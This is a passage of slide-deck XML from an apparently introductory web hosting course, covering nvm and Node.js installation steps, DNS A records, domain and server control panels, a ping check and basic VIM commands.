                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1535"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1535">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>bash install_nvm.sh</a:t>
            </a:r>
            <a:endParaRPr sz="1535">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-326072" lvl="0" marL="457200" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1535"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1535">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>export NVM_DIR="$HOME/.nvm"</a:t>
            </a:r>
            <a:endParaRPr sz="1535">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1535">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[ -s "$NVM_DIR/nvm.sh" ] &amp;&amp; \. "$NVM_DIR/nvm.sh"  # This loads nvm</a:t>
            </a:r>
            <a:endParaRPr sz="1535">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1535">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[ -s "$NVM_DIR/bash_completion" ] &amp;&amp; \. "$NVM_DIR/bash_completion"  # This loads nvm bash_completion</a:t>
            </a:r>
            <a:endParaRPr sz="1535">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-326072" lvl="0" marL="457200" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1535"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1535">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>source ~/.bash_profile</a:t>
            </a:r>
            <a:endParaRPr sz="1535">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-326072" lvl="0" marL="457200" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1535"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1535">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>command -v nvm</a:t>
            </a:r>
            <a:endParaRPr sz="1535">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-326072" lvl="0" marL="457200" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1535"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1535">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>nvm install --lts</a:t>
            </a:r>
            <a:endParaRPr sz="1535">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-326072" lvl="0" marL="457200" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1535"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1535">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Check with node -v, npm -v</a:t>
            </a:r>
            <a:endParaRPr sz="1535">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="196350"/>
            <a:ext cx="8520600" cy="76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chemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>A Record</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="863" name="Google Shape;863;p151"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370800" y="812250"/>
            <a:ext cx="8402400" cy="361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38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>An A record </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>point a domain name to the IP address</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://primarydomain.tld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                     - - &gt;  ip</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://subdomain.primarydomain.tld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  - - &gt;  ip</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://frontend.dollorinfotech.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - - &gt;  http://38.242.236.173</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="14147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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain Control Panel</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869" name="Google Shape;869;p152"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="25168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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Control Panel</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3820">
              <a:solidFill>
                <a:schemeClr val="accent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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3006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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain Control Panel</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="875" name="Google Shape;875;p153"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1073175" y="1810075"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1795975"/>
                <a:gridCol w="1795975"/>
                <a:gridCol w="1795975"/>
                <a:gridCol w="1795975"/>
              </a:tblGrid>
              <a:tr h="623375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2100"/>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2100"/>
                        <a:t>Name</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2100"/>
                        <a:t>Data</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2100"/>
                        <a:t>TTL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2100"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="599475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>A</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127.0.0.1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876" name="Google Shape;876;p153"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180125" y="3734350"/>
            <a:ext cx="6954000" cy="6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877" name="Google Shape;877;p153"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073175" y="1166450"/>
            <a:ext cx="6954000" cy="6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vishalmahawar.com domain panel</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="878" name="Google Shape;878;p153"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073175" y="3528650"/>
            <a:ext cx="6954000" cy="6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cmd &gt; ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vishalmahawar.com -t             </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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481150" y="0"/>
            <a:ext cx="8520600" cy="139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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="Google Shape;186;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1542600"/>
            <a:ext cx="8914376" cy="33516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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="196350"/>
            <a:ext cx="8520600" cy="76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chemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>VIM Commands</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="884" name="Google Shape;884;p154"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="723900" y="2722425"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3619500"/>
                <a:gridCol w="3619500"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>w</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Save</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Don’t Save</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
